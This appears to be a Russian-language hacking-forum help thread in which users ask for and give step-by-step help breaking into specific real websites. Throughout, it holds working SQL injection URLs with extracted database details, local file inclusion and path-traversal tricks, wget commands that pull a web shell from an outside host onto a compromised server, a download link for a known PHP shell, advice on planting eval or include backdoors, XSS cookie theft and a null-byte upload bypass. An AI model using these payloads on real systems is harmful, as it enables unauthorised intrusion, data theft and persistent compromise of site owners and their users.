есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?

oODungVTOo said:
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+


blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок.

пример скули:


Code:
http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if (ascii(substr(version(),1))=52,1,0))--+

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4

I don't see difference at this page........can u help me?

oODungVTOo said:
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4
I don't see difference at this page........can u help me?


The second option displaying "Madre e Hijo Nesk". The first option doesn't show anything

file=../../../../../proc/self/environ

выводит содержимое файла.

через Tamper записываю


PHP:


пытаюсь подключить,

file=../../../../../proc/self/environ&e=e=phpinfo();

просто выводит водержимое.

Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

chaby said:
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз


index.php?cmd=wget http://site.ru/shell.txt -O shell.php

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ

chaby said:
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз


посмотри стоит ли wget: index.php?cmd=whereis wget

Если стоит, делай так:

wget http://address/shell.txt -O /path/to/shell/shell.php

з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так:

index.php?cmd=ls -la

Sloneny said:
file=../../../../../proc/self/environ
выводит содержимое файла.
через Tamper записываю

PHP:


пытаюсь подключить,
file=../../../../../proc/self/environ&e=e=phpinfo();
просто выводит водержимое.
Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?


передай в заголовке User-agent.


chaby said:
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ


Сделай так:

1. index.php?cmd=phpinfo();

если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php

дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php

2. index.php?cmd=ls -la

если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл

шел скопируется в текущую диру, и потом просто открой sss.php

Соответственно сработает если хватит прав на запись.

chaby said:
права на запись есть и шщел есть мне его не куда залить чтоб прямую сылку получить


http://madnet.name/files/download/9_c99madshell.php

p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.

Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?

Iz etogo topika nechego rabotyeshego vrode ne nashel /thread246807.html

Spasibo

promarketing said:
Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?
Iz etogo topika nechego rabotyeshego vrode ne nashel /thread246807.html
Spasibo


например, http://sourceforge.net/projects/phporaadmin/

Хоть и не шелл.

&e=e=phpinfo(); - очепятка

Пробовал и с и без них. Всеравно выводит только содержимое с записанным в него кодом.

вывело содержимое с записанным в него кодом.

Вообще складывается такое впечатление что

просто не интерпретируется как php

Как бы сам сайт значения не имеет, но хочу понять почему так. В статьях нигде не указываются необходимые условия.

Ну по крайней мере мне такие не встречались(или читал не внимательно В одной статье автор вообще утверждает что доступ к /proc/self/environ

это 99% шелл Врет поди.

Привожу скрин содержимого.

Если код писать в User-Agent то вывод выглядит так.(Syntax Errors Found)

http://www.pictureshack.ru/thumbs/16531.jpg (http://www.pictureshack.ru/view_16531.jpg)

а если в Accept, то так

http://www.pictureshack.ru/thumbs/32022.jpg (http://www.pictureshack.ru/view_32022.jpg)

Sloneny said:
&e=e=phpinfo(); - очепятка
Пробовал и с и без них. Всеравно выводит только содержимое
с записанным в него кодом.
вывело содержимое с записанным в него кодом.
Вообще складывается такое впечатление что
просто не интерпретируется как php
Как бы сам сайт значения не имеет, но хочу понять почему так. В статьях нигде не указываются необходимые условия.
Ну по крайней мере мне такие не встречались(или читал не внимательно
В одной статье автор вообще утверждает что доступ к /proc/self/environ
это 99% шелл
Врет поди.
Привожу скрин содержимого.
Если код писать в User-Agent то вывод выглядит так.(Syntax Errors Found)
http://www.pictureshack.ru/thumbs/16531.jpg (http://www.pictureshack.ru/view_16531.jpg)
а если в Accept, то так
http://www.pictureshack.ru/thumbs/32022.jpg (http://www.pictureshack.ru/view_32022.jpg)


У тебя просто читалка, а не инклюд.

при вводе


Code:
index.php&req_subject=1&req_message=1">alert(1);

выводит


Multiple Choices
The document name you requested (/index.php&req_subject=1&req_message=1">alert(1);) could not be found on this server. However, we found documents with names similar to the one you requested.
Available documents:
/index.php/script> (common basename)


где /index.php/script> ссылка на сайт в виде http://site.com/index.php/script> которая открывается без ошибок

xss?

Sloneny said:
&e=e=phpinfo(); - очепятка
Пробовал и с и без них. Всеравно выводит только содержимое
с записанным в него кодом.
вывело содержимое с записанным в него кодом.
Вообще складывается такое впечатление что
просто не интерпретируется как php
Как бы сам сайт значения не имеет, но хочу понять почему так. В статьях нигде не указываются необходимые условия.
Ну по крайней мере мне такие не встречались(или читал не внимательно
В одной статье автор вообще утверждает что доступ к /proc/self/environ
это 99% шелл
Врет поди.
Привожу скрин содержимого.
Если код писать в User-Agent то вывод выглядит так.(Syntax Errors Found)
http://www.pictureshack.ru/thumbs/16531.jpg (http://www.pictureshack.ru/view_16531.jpg)
а если в Accept, то так
http://www.pictureshack.ru/thumbs/32022.jpg (http://www.pictureshack.ru/view_32022.jpg)


Скорее всего просто читалка.

Но на всякий случай покажи вывод /proc/self/status, возможно PHP там не интерпретируется, если там CGI.


alexvrn said:
Кто можешь помочь расскрутить?
_http://gushr[ТЫЦ]ustal.ru/index.php?categoryID=
_http://gushr[ТЫЦ]ustal.ru/index.php?categoryID=42&offset=20&sort=name&direction=ASC ( в offset=20 )
_http://gushr[ТЫЦ]ustal.ru/index.php?categoryID=42&sort=name&direction=ASC&show_all=yes ( в direction=ASC )
Кто поможет отблагодарю $


Тут ничего нету.


foozzi said:
при вводе

Code:
index.php&req_subject=1&req_message=1">alert(1);

выводит
где /index.php/script> ссылка на сайт в виде http://site.com/index.php/script> которая открывается без ошибок
xss?


Не совсем понял. Так alert() выполнился или нет? Если нет, то там нету XSS - логично же? о_0

есть пассивная xss в пост параметре, но включен magic_quotes - как с 13.14здить куки?

вот мой сплоит



xss

XSS DETECTED">

2Tigger

/proc/self/status,

Name: heitml

State: R (running)

SleepAVG: 78%

Tgid: 4627

Pid: 4627

PPid: 5784

TracerPid: 0

Uid: 65534 65534 65534 65534

Gid: 65534 65534 65534 65534

FDSize: 32

Groups: 100 615 65534

VmPeak: 13380 kB

VmSize: 13380 kB

VmLck: 0 kB

VmHWM: 3004 kB

VmRSS: 3004 kB

VmData: 824 kB

VmStk: 84 kB

VmExe: 464 kB

VmLib: 10972 kB

VmPTE: 20 kB

Threads: 1

SigQ: 0/16383

SigPnd: 0000000000000000

ShdPnd: 0000000000000000

SigBlk: 0000000000000000

SigIgn: 0000000000001200

SigCgt: 0000000180000000

CapInh: 0000000000000000

CapPrm: 0000000000000000

CapEff: 0000000000000000

Cpus_allowed: 0000000f

Mems_allowed: 1

Sloneny said:
2
Tigger
/proc/self/status,
Name: heitml
State: R (running)
SleepAVG: 78%
Tgid: 4627
Pid: 4627
PPid: 5784
TracerPid: 0
Uid: 65534 65534 65534 65534
Gid: 65534 65534 65534 65534
FDSize: 32
Groups: 100 615 65534
VmPeak: 13380 kB
VmSize: 13380 kB
VmLck: 0 kB
VmHWM: 3004 kB
VmRSS: 3004 kB
VmData: 824 kB
VmStk: 84 kB
VmExe: 464 kB
VmLib: 10972 kB
VmPTE: 20 kB
Threads: 1
SigQ: 0/16383
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000001200
SigCgt: 0000000180000000
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
Cpus_allowed: 0000000f
Mems_allowed: 1


Хм... heitml, не встречался с таким.

Укажи путь к любому PHP скрипту который есть на серваке, если страничку выполнит - инклюд, если откроет исходный код, то это просто читалка.

Все верно, оказалась просто читалка.

Подскажите пожалуйста как бороться если дописывает папку в начале пути

inc/../../../etc/passwd

как обрезать расширение описано много, но вот как обрезать папку в начале никак не могу найти.

или это не мешает и дополнительная ../ выйдет из папки

(глупость по ходу спросил, но лучше перебдеть чем недобдеть

Sloneny said:
Все верно, оказалась просто читалка.
Подскажите пожалуйста как бороться если дописывает папку в начале пути
inc/../../../etc/passwd
как обрезать расширение описано много, но вот как обрезать папку в начале никак не могу найти.
или это не мешает и дополнительная ../ выйдет из папки
(глупость по ходу спросил, но лучше перебдеть чем недобдеть


попробуй использовать в начале ....//

Есть чятик. В чятике есть функция создания своего канала. Вот в поле "название канала" можно вставлять любой javascript, но уже потом, после создания, в title созданного канала это все дело фильтруется. Но при первичном отсылании запроса - js исполняется. Внимание вопрос: можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?

.::f-duck::. said:
можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?


Можно

p.s.: если хочешь услышать более подробный ответ, задай более подробный вопрос

http://gb.anekdot.ru/scripts/gb.php?component=gb&id=' так и не понял что за бага/

разъясните что за фрукт пожалуйста

Boobby said:
разъясните что за фрукт пожалуйста


Это не то, о чем ты подумал. Там intval на id

обезательно делать так что бы выбило ошибку для пхп инъекции? или можно попробовать залить шелл вставив его сюда nds.com/index.php?view=.......

.::f-duck::. said:
Есть чятик. В чятике есть функция создания своего канала. Вот в поле "название канала" можно вставлять любой javascript, но уже потом, после создания, в title созданного канала это все дело фильтруется. Но при первичном отсылании запроса - js исполняется. Внимание вопрос: можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?


Если нет проверки referer, капчи, токенов - то можно. Это POST XSS. Нужно создать HTML файл с зловредной формой, и написать яваскрипт отправляющий её на сервер. Если всё получиться, то спрятать её в IFrame на каком ни будь сайте.

P.S. Можешь стукнуть в ПМ.

Если нет проверки referer, капчи, токенов - то можно


Если есть тоже можно (https://antichat.live/threads/273030/)


Это POST XSS


Там где пост, и гет недалек, скорее всего работает и то и другое, другое дело что когда есть гет то не факт что есть пост, данные в пост практически всегда фильтруются лучше гет

eclipse said:
Если есть тоже
можно (https://antichat.live/threads/273030/)
Там где пост, и гет недалек, скорее всего работает и то и другое, другое дело что когда есть гет то не факт что есть пост, данные в пост практически всегда фильтруются лучше гет


Первое - Там совсем не то. Совсем нельзя А в той статье просто рассказываться использование XSS помимо кражи кук.

//Если уж есть XSS, подходящая к твоей статье, нет смысла использовать эту.

Кроме того, существуют кривые фильтры на проверку REFERER, будут пропускать например такое:


Code:
https://forum.antichat.net/qwerty
in
https://xakep.ru/forum.antichat.net/qwerty

А токены могут вовсе не проверяться.

Другое дело - XSS уже есть, но куки защищены по IP. В этом случае нужно ичпользовать что то нестандартное, от отправки запросов до прикручивания антигейта к капче(JavaScript).

UDP для M_Script:

Я прикручивал Разуметься через серверного посредника(PHP, Perl...).

eclipse said:
Если есть тоже можно


Он имел ввиду защиту именно в запросе, которым внедряется код. Есть защита -> нет XSS -> нет обхода защиты.


eclipse said:
данные в пост практически всегда фильтруются лучше гет


Откуда такая статистика?


XAMEHA said:
до прикручивания антигейта к капче(JavaScript)


Преувеличил немного возможности JS =)

Откуда такая статистика?


А ты посчитай сколько я выложил тут XSS

ХАМЕНА, M_Script, На счет использования обхода внутри XSS, извиняйте, я вас не понял, мне показалось что XSS уже есть))

Нарвался на одну интересную скулю.


Code:
http://sotchi-2014.info/content.php?id=1'

Пробовал сначала крутить через union, но скрипт грязно ругнулся


Code:
http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+

The used SELECT statements have a different number of columns

В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.

Но опять же следующий запрос выводится корректно


Code:
http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+ TRUE

http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+ FALSE

Что навело на мысль, что колонка всё таки 1.

Далее попробовал крутануть через другой метод.


Code:
http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database() ),floor(rand(0)*2))+having+min(0)+or+1+--+

БД, юзверя, и версию выводит корректно.

На попытку вывести что либо ещё ругается на СЕЛЕКТ.

Подскажите, каким путём докрутить данную скулю ?

BigBear said:
Нарвался на одну интересную скулю.

Code:
http://sotchi-2014.info/content.php?id=1'

Пробовал сначала крутить через union, но скрипт грязно ругнулся

Code:
http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+

The used SELECT statements have a different number of columns

В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.
Но опять же следующий запрос выводится корректно

Code:
http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+ TRUE

http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+ FALSE

Что навело на мысль, что колонка всё таки 1.
Далее попробовал крутануть через другой метод.

Code:
http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database() ),floor(rand(0)*2))+having+min(0)+or+1+--+

БД, юзверя, и версию выводит корректно.
На попытку вывести что либо ещё ругается на СЕЛЕКТ.
Подскажите, каким путём докрутить данную скулю ?


Там просто двойной запрос.

Колонка 1 учавствует в еще одном запросе и поэтому там ошибка. Но вывод получить можно, вывод в TITLE:

http://sotchi-2014.info/content.php?id=175'+and+1=2+UNION+SELECT+version()--+

4.0.26-log- Sotchi-2014.info

P.S.:

В твоем запросе (http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+) тоже есть вывод, посмотри внимательней на TITLE.

Code:
mtXSw0CTf154c3cdd36f52d364713cbb7a75f2e2

Что это?

Kuteke said:

Code:
mtXSw0CTf154c3cdd36f52d364713cbb7a75f2e2

Что это?


соль: mtXSw0CT

и хеш: f154c3cdd36f52d364713cbb7a75f2e2

слил с сайта инфу с таблицы mysql.такого типа Host User Password

как найти phpmyadmin? сканеры директорий не помогают

Смотри соседние сайты. Может найдёшь там. Посмотри базы, может проще через админку сайта/соседних сайтов залить шелл будет, чем искать пма и брутить пасс.

Boobby said:
слил с сайта инфу с таблицы mysql.такого типа Host User Password
как найти phpmyadmin? сканеры директорий не помогают


его там может не быть, он может быть на другом хосте, папка может быть названа как угодно.

а в mysql.user лежат аккаунты базы, а не пма.

помогите с проблемкой!


Code:
http://bsgv.ru/ipo_calc.php?bc_tovar_id=2 && 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,select @n from (select @n:='',(select null from information_schema.columns where 0x1 in (@n:=concat(@n,0x7c,table_schema,0x3a,table_name,0 x3a,column_name))))n,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72 ,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,8 9,90,91,92,93,94,95,96,97,98,99,100,101,102,103,10 4,105,106,107,108,109,110,111,112,113,114,115,116, 117,118,119,120,121,122,123,124,125,126,127,128,12 9,130,131,132,133,134,135,136,137,138,139,140,141, 142,143,144,145,146,147,148,149,150,151 #

но почемуто,не хочет выводить!

может подскажет кто какой запрос ещё ввести?

Faaax said:
помогите с проблемкой!

Code:
http://bsgv.ru/ipo_calc.php?bc_tovar_id=2 && 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,select @n from (select @n:='',(select null from information_schema.columns where 0x1 in (@n:=concat(@n,0x7c,table_schema,0x3a,table_name,0 x3a,column_name))))n,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72 ,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,8 9,90,91,92,93,94,95,96,97,98,99,100,101,102,103,10 4,105,106,107,108,109,110,111,112,113,114,115,116, 117,118,119,120,121,122,123,124,125,126,127,128,12 9,130,131,132,133,134,135,136,137,138,139,140,141, 142,143,144,145,146,147,148,149,150,151 #

но почемуто,не хочет выводить!
может подскажет кто какой запрос ещё ввести?


там блайнд

d1v said:
там блайнд


там нет блайнда!


Code:
http://bsgv.ru/ipo_calc.php?bc_tovar_id=2%20%26%26%201%3D2%20UNIO N%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C1 0%2C11%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203 A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29% 29%2C0x3566646B68%29%2C13%2C14%2C15%2C16%2C17%2C18 %2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28 %2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38 %2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48 %2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58 %2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2C67%2C68 %2C69%2C70%2C71%2C72%2C73%2C74%2C75%2C76%2C77%2C78 %2C79%2C80%2C81%2C82%2C83%2C84%2C85%2C86%2C87%2C88 %2C89%2C90%2C91%2C92%2C93%2C94%2C95%2C96%2C97%2C98 %2C99%2C100%2C101%2C102%2C103%2C104%2C105%2C106%2C 107%2C108%2C109%2C110%2C111%2C112%2C113%2C114%2C11 5%2C116%2C117%2C118%2C119%2C120%2C121%2C122%2C123% 2C124%2C125%2C126%2C127%2C128%2C129%2C130%2C131%2C 132%2C133%2C134%2C135%2C136%2C137%2C138%2C139%2C14 0%2C141%2C142%2C143%2C144%2C145%2C146%2C147%2C148% 2C149%2C150%2C151%20%23

5.1.42-log : bsgv_base : bsgv_user@localhost

d1v said:
там блайнд


Там не блайнд.

JS отключи, или в исходники загляни.


Code:
http://tinyurl.com/44fsh2n

всё и дальше не идёт только показал,что есть в information_schema!


Code:
http://tinyurl.com/3nx5tzf

http://bsgv.ru/ipo_calc.php?bc_tovar_id=2%20and%20null%20union%20 select%201,2,3,4,(select+bc_id+from+binn_catalog2+ limit+0,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,7 0,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86, 87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 ,103,104,105,106,107,108,109,110,111,112,113,114,1 15,116,117,118,119,120,121,122,123,124,125,126,127 ,128,129,130,131,132,133,134,135,136,137,138,139,1 40,141,142,143,144,145,146,147,148,149,150,15--


получаешь 2. Всё норм выводит. Первая таблица пустая.

Boobby said:
слил с сайта инфу с таблицы mysql.такого типа Host User Password
как найти phpmyadmin? сканеры директорий не помогают


Как найти Phpmyadmin​

1) Идем по адресу whois.domaintools.com, смотрим ns-сервера, типа:

ns1.masterhost.ru

ns2.masterhost.ru

Значит хостер masterhost.ru

2) Идем на masterhost.ru

3) Ищем ссылки типа "Помощь", "Саппорт", "FAQ", "ЧаВо" и переходим.

4) В FAQ ищем "Работа с MySQL", "Управление БД" и т.д. И опять переходим!

5) Там хостер показывает адрес phpmyadmin. В нашем случае phpmyadmin.masterhost.ru

6) Заходим и делаем свои дела

Уважаемые багоискатели, помогите найти в ниже указанном коде уязвимость.. Есть ли она там? Нашел только активную XSS, и все.. Провести скуль не получается, ибо нет вывода ошибки, и провести блайнд в инсерте, как уже подсказали, нереально.. PHP code execution тоже не выходит.. Может что-то упустил? Помогите..


PHP:

insert(TEMPLATES_TABLE, array('gall_type'=>$gall_type,'gall_settings'=>serialize($settings),'created'=>date("Y-m-d"),'templ_title'=>$_POST['templ_title'],'templ_description'=>$_POST['templ_description']));

if ($wpdb->insert_id>0) {

?>



/* ');

win.tb_rem ove();

/* ]]> */



$gall_type ,'gall_settings'=>serialize($settings));

if ($_POS T['templ_description'] !='') {

$templ_description=$_POST['templ_description'];

$to_update['templ_description'] =$templ_description;

}

$wpdb->update(TEMPLATES_TABLE,$to_update, array('id'=>$templ_id));

?>



/* [/COLOR]');

win.tb_rem ove();

/* ]]> */



$value) {

$name='sc_'.$key.'__';

foreach ($valueas$key_2=>$value_2) {

$attr_name=$name.$key_2;

$new_value= (string)$value_2;

$settings_array[$attr_name] =str_replace('0x','',$new_value);

}

}

if (empty($settings_array)) {

die('Invalid settings');

}� �

$settings=fgallery_prepare_settings($settings_arra y);

} else {

di e('Invalid template');

}

}

if(fgallery_save_a lbum_settings($gall_id,$settings)) {

?>



/* */







[/COLOR]

PHP:
if ($_POST['templ_title'] !='') {

$wpdb->insert(TEMPLATES_TABLE, array('gall_type'=>$gall_type,'gall_settings'=>serialize($settings),'created'=>date("Y-m-d"),'templ_title'=>$_POST['templ_title'],'templ_description'=>$_POST['templ_description']));

...

http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html

конструкция может прикатить при условии что где-то будет вывод из TEMPLATES_TABLE. а слепую можно замутить с if() и/или benchmark().

+toxa+ said:

PHP:
if ($_POST['templ_title'] !='') {

$wpdb->insert(TEMPLATES_TABLE, array('gall_type'=>$gall_type,'gall_settings'=>serialize($settings),'created'=>date("Y-m-d"),'templ_title'=>$_POST['templ_title'],'templ_description'=>$_POST['templ_description']));

...

http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
конструкция может прикатить при условии что где-то будет вывод из TEMPLATES_TABLE. а слепую можно замутить с if() и/или benchmark().


Есть вывод, когда $_GET['action'] = 'load', т.е.

http://localhost/wp/wordpress/wp-content/plugins/gallery/templ.php?gall_id=1&action=load

Тут выводится 'templ_title' и 'templ_description', соответственно получается активная XSS, так как при templs.php?action=save, я в пост запросы без проблем могу передать что угодно, в данном случае javascript.. Код инсертится в БД, а потом при лоаде выводится.. Не совсем вкурил насчет "INSERT ... ON DUPLICATE KEY UPDATE".. Попробую вкурить...

Как шелл в PHP код добавить что то типа


include $_GET['shell']

ne0k said:
Отобразится как обычный текст. Не катит. Давно бы сделал.
Если же заключать в в теги "" и или "", на странице вывода не отображается, но в исходном коде страницы красуется в розовом цвете, что-то вроде комментария..


Ты чтото путаешь) Я не о том.) Мне нужно дыру сдделать в самом Php коде

Вот вспоминл)) Я о этом имел ввиду


if (isset($_GET['shell'])) {
include($_GET['shell'];
}

[akep"]
DJ ][akep said:
Вот вспоминл)) Я о этом имел ввиду


Я думаю лучше в качестве бекдора оставить не инклуд, а выполнение произвольного php кода, например


PHP:


Вызывается так: php?code=phpinfo();

Можно придумать миллион других примеров.

Code:
http://modcos.com/news.php?id=42

нашол количество столбцов - 6

но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.

в чем причина?

kokes said:

Code:
http://modcos.com/news.php?id=42

нашол количество столбцов - 6
но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.
в чем причина?


Там WAF, на связку UNION SELECT и при встрече OR, т.е. ORDER попадает тоже под фильтр.

Ну... Крути как Blind:

http://modcos.com/news.php?id=42+and+substring(version(),1,1)=5 - Валидный запрос

http://modcos.com/news.php?id=42+and+substring(version(),1,1)=4 - FALSE

Когда запрос вовзращает TRUE, то выводятся там все комментарии. Можно раскрутить как Blind.

user() \ 033038003_adminm@localhost

version() \ 5.0.67-percona-highperf-b7-log

database() \ babinsoft_modcos

вообщем случайно нашел активную хсс

и не понимаю как сделать так что бы воровались куки на форуме

Сама активка на главной странице сайта site.com

Если я кину сылку на форуме (на главную страницу с хсс)..это как бы получится пасивка же..как сделать в такой ситуации что бы при просмотре темы на форуме выполнялась активка?

И какой толк в таких активках, например в поле имя при регистрации итд?

reddim

Больше информации тебе в этой теме ни кто не даст, читай маны.

Тут всё написано /thread20140.html (https://antichat.live/threads/20140/)

Подскажите почему не выводиться содержимое колонок?

http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--

Samael91 said:
Подскажите почему не выводиться содержимое колонок?
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--


там нет такой таблички..потому и не выводит

Samael91, таблица `users` находится в БД `test_base`, текущая - `zorro_feb`.


Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +test_base.users+limit+1,1+--+

PHP:
$height&&$newheight".$nazi."/a>");

if (!is_numeric($xxx) and$xxx!="")

die($lerror2." ".$nazi."");

$ext= array("jpg","jpeg","JPG","JPEG","gif","GIF","png","PNG");

$file_name=$upl['name'];

if ($upload_url!="")

$file_name=$upload_url;

if (!in_array(end(explode(".",$file_name)),$ext))

die($lerror3." ".$nazi."");

$file_name=md5(time().rand().time());

if ($upload_url!="")

$file_ext=explode(".",$upload_url);

else

$file_ext=explode(".",$upl['name']);

if ($xxx==1)

$url=$file_name."_xxx.".end($file_ext);

else

$url=$file_name.".".end($file_ext);

$http_url=explode("/",$_SERVER['REQUEST_URI']);

foreach($http_urlas$key=>$val) {

if (end($http_url)!=$val)

$http.=$val."/";

}

$file_to_upload=$upl['tmp_name'];

if (isset($upload_url)){

$file_to_upload=$upload_url;

}

include("admin/config.php");

if($js==1)

{

$jsc="rel='lightbox'";

}

else

{

$jsc="";

}

$http_url="http://".$_SERVER['HTTP_HOST'].$http."upload_image/".$url;

$http_thumb_url="http://".$_SERVER['HTTP_HOST'].$http."upload_image/thumb/".$url;

if (copy($file_to_upload,"upload_image/".$url)) {

resizeimаgе("upload_image/".$url,"upload_image/thumb/".$url,$thumb_size,$thumb_size) or die("Error!");

$result="".$lyzezagry."
".$leve."";

$result.="

";

if ($xxx==1)

$result="Изображение доступно толь ко для лиц лет
Загрузить еще

";

$result.="BBCode:
";

$result.="

";

$result.="HTML:
";

$result.="\">

";

$result.="".$ladressiii.":
";

$result.="

";

echo$result;

}

else

die($lerror2);

?>

Скрипт заливки изображений, хочу чрез его залить шелл. Можно обойти фильтрацию?

фильтрация защищена от заливки вроде полностью. кстати даже очень хорошо написан код)

Только вот copy до некоторых версий принимает NULL-Байт как конец строки.


PHP:
...

$upload_url=$_REQUEST['url'];

....

$file_name=$upload_url;

...

$url=$file_name.".".end($file_ext);

...

copy($file_to_upload,"upload_image/".$url);

...



Соответственно можно получить шелл(Если в этом каталоге запрещено выполнение PHP скриптов, можно перейти в другой.).

Плюс ко всему через функцию copy можно копировать файлы не только переданные по HTTP, но и из внутренних каталогов системы.


PHP:
...

$upload_url=$_REQUEST['url'];

....

if (isset($upload_url)){

$file_to_upload=$upload_url;

}



Так же тут может помочь эта уязвимость: https://forum.antichat.net/thread98525.html

XAMEHA в данном коде нельзя будет применить copy для последнего байта

как раскрутить http://www.axess-industries.com/catalog/product.php?IdCategory=14130205 ? Помогите кто в курсе)

SEWERN said:
как раскрутить http://www.axess-industries.com/catalog/product.php?IdCategory=14130205 ? Помогите кто в курсе)


нет тут скули.

$IdCategory = (int)$_GET['IdCategory'];

Заранее спасибо.

http://www.parabank.az/browse.php?lang=rus&page=-1%27

народ такой вопрос на одном сайте нашёл уязвимость, могу вывести картинку или текст на сайт GET запросом.

Но не выходит вывести ни iframe ни javascript

">alert() - в коде отображается, но когда смотрю через Developer Tools - то вижу -

различные варианты:

так же не запускают яву, куда дальше рыть?

boobl said:
">alert() - в коде отображается


Если все отображается, то этого должно быть достаточно. Посмотри в исходнике, может быть нужно закрыть несколько тегов сначала, а уже потом выводить свой скрипт.

Chrome~ said:
Если все отображается, то этого должно быть достаточно. Посмотри в исходнике, может быть нужно закрыть несколько тегов сначала, а уже потом выводить свой скрипт.


код закрыт. там в инпут идёт код:

?FPriceMin=">alert();

через Developer Tools -

boobl said:
народ такой вопрос на одном сайте нашёл уязвимость, могу вывести картинку или текст на сайт GET запросом.
Но не выходит вывести ни iframe ни javascript
">alert() - в коде отображается, но когда смотрю через Developer Tools - то вижу -
различные варианты:

так же не запускают яву, куда дальше рыть?


а рой дальше в сторону того как, какой браузер как инфу отображает.

aydin-ka said:
Заранее спасибо.
http://www.parabank.az/browse.php?lang=rus&page=-1%27


Читай маны по скулям. Нет тут ничего.

http://aqua-st.ru/catalog/102

Помогите! Обычные трюки не проходят!

Kuteke said:
http://aqua-st.ru/catalog/102
Помогите! Обычные трюки не проходят!


Обычное внедрение SQL-кода в запрос:


Code:
SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...

Можно просто сделать так:


Code:
1) and 1=2 UNION SELECT ...#

Советую обратиться к документации MySQL.

XAMEHA said:
Обычное внедрение SQL-кода в запрос:

Code:
